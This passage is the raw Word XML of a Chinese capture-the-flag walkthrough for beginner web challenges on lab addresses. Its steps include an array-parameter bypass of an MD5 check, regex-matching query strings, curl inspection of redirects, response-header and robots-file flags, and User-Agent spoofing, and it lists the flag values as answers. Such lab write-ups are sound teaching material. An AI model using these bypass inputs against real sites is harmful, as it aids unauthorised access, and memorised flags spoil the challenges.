          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE21FF" w:rsidRPr="00BE21FF" w:rsidRDefault="00BE21FF" w:rsidP="00BE21F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BE21F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BE21F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BE21F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BE21F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BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>打开火狐浏览器，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF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&lt;http://10.137.0.143/26/&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21F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BE21F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BE21FF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BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE21FF" w:rsidRPr="00BE21FF" w:rsidRDefault="00BE21FF" w:rsidP="00BE21F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601423" cy="3014421"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38" name="图片 38" descr="http://192.168.109.235/storage/images/20181210104512XX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192.168.109.235/storage/images/20181210104512XXe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89" cy="303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1FF" w:rsidRPr="00BE21FF" w:rsidRDefault="00BE21FF" w:rsidP="00BE21F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BE21F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BE21F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BE21F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BE21F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BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在地址栏输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF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&lt;http://10.137.0.142/26/?id=ket1key1111:/1/1key&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF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BE21F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匹配正则表达式（答案不唯一），访问成功弹出</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF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BE21FF" w:rsidRDefault="00BE21FF" w:rsidP="00BE21FF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325150" cy="1972584"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="37" name="图片 37" descr="http://192.168.109.235/storage/images/20181210104644Yf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192.168.109.235/storage/images/20181210104644YfQ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342" cy="1995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AE3" w:rsidRPr="00BE21FF" w:rsidRDefault="00B37AE3" w:rsidP="00B37AE3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B37AE3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 0abd3587a3a633ca1300b554357ff03a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排好队，绕过去</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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3450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>传数组会返回</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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3450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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/27,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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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MD5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传数组会返回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NULL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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打开火狐浏览器，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE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&lt;http://10.137.0.76/27/&gt;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) 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访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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924425" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="40" name="图片 40" descr="http://192.168.109.235/storage/images/201812101056053V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192.168.109.235/storage/images/201812101056053VK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0DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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在地址处输入</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE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&lt;http://10.137.0.76/27/?uname[]=1&amp;&amp;passwd[]=2&gt;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访问弹出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3450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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468975" cy="1987174"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="图片 39" descr="http://192.168.109.235/storage/images/20181210105706tz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192.168.109.235/storage/images/20181210105706tzL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929" cy="20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AE3" w:rsidRPr="003450DE" w:rsidRDefault="00B37AE3" w:rsidP="00B37AE3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B37AE3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 117f8628f187c24bbe15febead3046fa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个地址好奇怪</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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3450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>需要重定向到</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的那个页面，用</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>命令，查看源代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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3450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信息隐藏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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/28,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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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需要重定向到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index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的那个页面，用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curl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命令，查看源代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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打开火狐浏览器，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE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&lt;http://10.137.0.55/28/&gt;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访问如图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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029200" cy="4829175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="44" name="图片 44" descr="http://192.168.109.235/storage/images/201812101103282b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192.168.109.235/storage/images/201812101103282bp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0DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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这道题需要用到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curl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工具，输入网址</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;https://curl.haxx.se/windows&gt;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下载安装程序，选择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curl for 32 bit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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343871" cy="2445429"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="43" name="图片 43" descr="http://192.168.109.235/storage/images/20181210112859Q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://192.168.109.235/storage/images/20181210112859QN1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546" cy="246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0DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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将程序解压，放到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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里运行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curl.exe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，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>curl.exe –v “http://10.137.0.55/28/index.php”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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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456881" cy="3516986"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="42" name="图片 42" descr="http://192.168.109.235/storage/images/201812101129438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192.168.109.235/storage/images/201812101129438G3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820" cy="35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0DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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查看页面信息找到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3450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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3330759" cy="2164080"/>
            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
            <wp:docPr id="41" name="图片 41" descr="http://192.168.109.235/storage/images/20181210113000vA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://192.168.109.235/storage/images/20181210113000vAz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04" cy="219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DC9" w:rsidRPr="000E6DC9" w:rsidRDefault="000E6DC9" w:rsidP="003450DE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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E6DC9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>curl.exe –v “http://xxxxxxxx/28/index.php”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB1735" w:rsidRDefault="00CB1735" w:rsidP="00CB1735">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB1735">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1834012245d785120e3505ed169</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB1735" w:rsidRPr="00CB1735" w:rsidRDefault="00CB1735" w:rsidP="00CB1735"/>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>头都大了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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3450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过查看控制台里的网络选项的响应头信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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3450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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/29,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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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头都大了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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通过查看控制台里的网络选项的响应头信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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打开火狐浏览器，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE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&lt;http://10.137.0.139/29/&gt;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 (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访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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77891" cy="2317804"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="47" name="图片 47" descr="http://192.168.109.235/storage/images/20181210142608dR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192.168.109.235/storage/images/20181210142608dR6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802" cy="2352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0DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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按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F12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打开控制台，如图所示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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7631345" cy="4342066"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
            <wp:docPr id="46" name="图片 46" descr="http://192.168.109.235/storage/images/201812101427190Y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://192.168.109.235/storage/images/201812101427190Y9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9453" cy="437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0DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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点击网络选项，选择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/29/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的这个文件，点击消息头，在响应头里找到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“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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hereisflag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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”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字段，得到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3450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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712945" cy="2709015"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45" name="图片 45" descr="http://192.168.109.235/storage/images/20181210142837S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192.168.109.235/storage/images/20181210142837Sa6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827" cy="274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DC9" w:rsidRPr="003450DE" w:rsidRDefault="000E6DC9" w:rsidP="000E6DC9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6DC9">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> b7bb30b3435f2e7c418b131f9e789f81</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不仅仅是个</w:t>
      </w:r>
      <w:r w:rsidR="0038598C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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3450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rebots.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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3450DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信息隐藏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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/30,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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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450DE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3450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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查看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rebots.txt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文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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打开火狐浏览器，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE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&lt;http://10.137.0.154/30/&gt;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 (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访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003450DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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38432" cy="2623820"/>
            <wp:effectExtent l="0" t="0" r="635" b="5080"/>
            <wp:docPr id="49" name="图片 49" descr="http://192.168.109.235/storage/images/201812101434105b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://192.168.109.235/storage/images/201812101434105bj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421" cy="264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0DE" w:rsidRPr="003450DE" w:rsidRDefault="003450DE" w:rsidP="003450D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3450D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在地址栏输入</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE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&lt;http://10.137.0.154/30/rebots.txt&gt;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查看，找到</w:t>
      </w:r>
      <w:r w:rsidRPr="003450DE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3450DE" w:rsidRDefault="003450DE" w:rsidP="003450DE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650062" cy="5070044"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="48" name="图片 48" descr="http://192.168.109.235/storage/images/20181210143542Yv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://192.168.109.235/storage/images/20181210143542YvK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147" cy="5097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DC9" w:rsidRPr="003450DE" w:rsidRDefault="000E6DC9" w:rsidP="000E6DC9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6DC9">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 44b552d856ba3dfb93a9e33229f0d540</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器的锅？？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E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F6440E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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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6440E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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E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F6440E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据截取，修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6440E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6440E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请求头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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6440E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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E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F6440E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6440E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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6440E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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1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访问网址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/33,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通过抓包修改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User-Agent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的方法，达到以假乱真的效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E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F6440E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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E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通过抓包修改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User-Agent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的方法，达到以假乱真的效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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打开火狐浏览器，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6440E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&lt;http://10.10.23.105/33/&gt;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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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038600" cy="1466850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57" name="图片 57" descr="http://192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18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://192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18-17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40E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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提示用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opera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浏览器访问，可以通过抓包修改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User-Agent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的方法，打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，如果没有可以到官网下载</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6440E">
        <w:rPr>
